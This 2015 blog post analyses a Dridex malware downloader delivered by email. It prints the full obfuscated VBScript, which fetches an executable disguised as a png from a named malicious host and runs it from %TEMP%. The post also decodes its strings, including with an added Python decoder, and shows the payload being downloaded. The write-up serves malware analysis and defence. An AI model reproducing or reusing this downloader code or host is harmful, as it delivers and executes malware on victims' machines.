Saturday, May 2, 2015

Sneaky Dridex Downloader

On Friday, our sandboxes saw multiple emails with attached malicious documents, each one making a call out to the same Pastebin location and doing very little else. Clearly the next stage was being fetched from there, which triggered my interest, so I followed the Pastebin link and got this:

dim GUIGUiuisu: Set GUIGUiuisu = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) ) 
dim oUIUwefeffffff: Set oUIUwefeffffff = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) ) 
GUIGUiuisu.Open Chr(71) & Chr(69) & Chr(84) , Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(104) & Chr(111) & Chr(115) & Chr(116) & Chr(46) & Chr(97) & Chr(100) & Chr(118) & Chr(105) & Chr(115) & Chr(111) & Chr(114) & Chr(99) & Chr(111) & Chr(110) & Chr(115) & Chr(117) & Chr(108) & Chr(116) & Chr(105) & Chr(110) & Chr(103) & Chr(103) & Chr(114) & Chr(111) & Chr(117) & Chr(112) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & Chr(105) & Chr(109) & Chr(97) & Chr(103) & Chr(101) & Chr(47) & Chr(105) & Chr(109) & Chr(97) & Chr(103) & Chr(101) & Chr(46) & Chr(112) & Chr(110) & Chr(103) , False 
GUIGUiuisu.Send 
Set dfgfderer = WScript.CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) ).Environment(Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115) ) 
oOJIGHUGHFff = dfgfderer(Chr(84) & Chr(69) & Chr(77) & Chr(80) ) 
ooOOOOOOf = oOJIGHUGHFff + Chr(92) & Chr(112) & Chr(112) & Chr(112) & Chr(80) & Chr(80) & Chr(79) & Chr(79) & Chr(73) & Chr(118) & Chr(118) & Chr(86) & Chr(46) & Chr(101) & Chr(120) & Chr(101)  
with oUIUwefeffffff 
.type = 1  
.open 
.write GUIGUiuisu.responseBody 
.savetofile ooOOOOOOf, 2  
end with 
Set pPPPPIuhiGUv = CreateObject(Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110) ) 
pPPPPIuhiGUv.Open ooOOOOOOf

This is VBScript, made hard to read by building every interesting string out of Chr() character codes. A little grep-fu pulls those numbers out into a csv:

77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,65,100,111,100,98,46,83,116,114,101,97,109,71,69,84,104,116,116,112,58,47,47,104,111,115,116,46,97,100,118,105,115,111,114,99,111,110,115,117,108,116,105,110,103,103,114,111,117,112,46,99,111,109,47,105,109,97,103,101,47,105,109,97,103,101,46,112,110,103,87,83,99,114,105,112,116,46,83,104,101,108,108,80,114,111,99,101,115,115,84,69,77,80,92,112,112,112,80,80,79,79,73,118,118,86,46,101,120,101,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110

Converting those codes back to characters gives:

Microsoft.XMLHTTPAdodb.StreamGEThttp://host.advisorconsultinggroup.com/image/image.pngWScript.ShellProcessTEMP\pppPPOOIvvV.exeShell.Application
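The extract-and-convert step above, as an added Python script (not the author's grep one-liner): it decodes each `Chr(n) & Chr(n) ...` run separately, so the string boundaries survive instead of everything collapsing into one blob as in the output above. The sample input is three lines taken from the script above and embedded inline.

```python
import re
from typing import List

# A run of Chr(n) calls joined by "&", e.g. Chr(77) & Chr(105) & Chr(99).
# Each run is one obfuscated string literal in the original script.
CHR_RUN = re.compile(r'Chr\(\s*\d+\s*\)(?:\s*&\s*Chr\(\s*\d+\s*\))*', re.IGNORECASE)
CHR_ONE = re.compile(r'Chr\(\s*(\d+)\s*\)', re.IGNORECASE)

# Constructed sample: three lines copied from the Pastebin script above.
SAMPLE = r'''dim GUIGUiuisu: Set GUIGUiuisu = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) )
oOJIGHUGHFff = dfgfderer(Chr(84) & Chr(69) & Chr(77) & Chr(80) )
ooOOOOOOf = oOJIGHUGHFff + Chr(92) & Chr(112) & Chr(112) & Chr(112) & Chr(80) & Chr(80) & Chr(79) & Chr(79) & Chr(73) & Chr(118) & Chr(118) & Chr(86) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
'''


def _run_to_str(run: str) -> str:
    """Turn one 'Chr(a) & Chr(b) ...' run into the string it builds."""
    return ''.join(chr(int(code)) for code in CHR_ONE.findall(run))


def decode_chr_runs(script: str) -> List[str]:
    """Return every obfuscated string in the script, one entry per Chr() run,
    in source order. Unlike a flat list of all codes, this keeps the
    boundaries between object names, paths and URLs intact."""
    return [_run_to_str(m.group(0)) for m in CHR_RUN.finditer(script)]


def deobfuscate(script: str) -> str:
    """Rewrite the script with each Chr() run replaced by a quoted literal,
    giving an analyst a readable version of what the script actually does."""
    return CHR_RUN.sub(lambda m: '"' + _run_to_str(m.group(0)) + '"', script)


if __name__ == '__main__':
    for s in decode_chr_runs(SAMPLE):
        print(repr(s))
    print(deobfuscate(SAMPLE))
```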

Aha! There's a URL, an exe name and location under %TEMP%, and a Shell.Application object to launch it; it should be pretty obvious by now what's going on. Let's get that "png"...

$ wget http://host.advisorconsultinggroup.com/image/image.png
--2015-05-01 14:34:29--  http://host.advisorconsultinggroup.com/image/image.png
Resolving host.advisorconsultinggroup.com (host.advisorconsultinggroup.com)... 91.227.18.80
Connecting to host.advisorconsultinggroup.com (host.advisorconsultinggroup.com)|91.227.18.80|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 141824 (138K) [image/png]
Saving to: ‘image.png’

100%[======================================>] 141,824      111KB/s   in 1.2s   

2015-05-01 14:34:35 (111 KB/s) - ‘image.png’ saved [141824/141824]

Rename the png to an exe, just like the VBScript would do, and we have our payload:

https://www.virustotal.com/en/file/b979554a3fe3982e2d7fe73c491c4badbf273323eeb611d44bd8cc20c5933e58/analysis/1430491072/

Looks like a Dridex variant; the detection rate on VT moved up from 3/56 yesterday to 26/56 today.
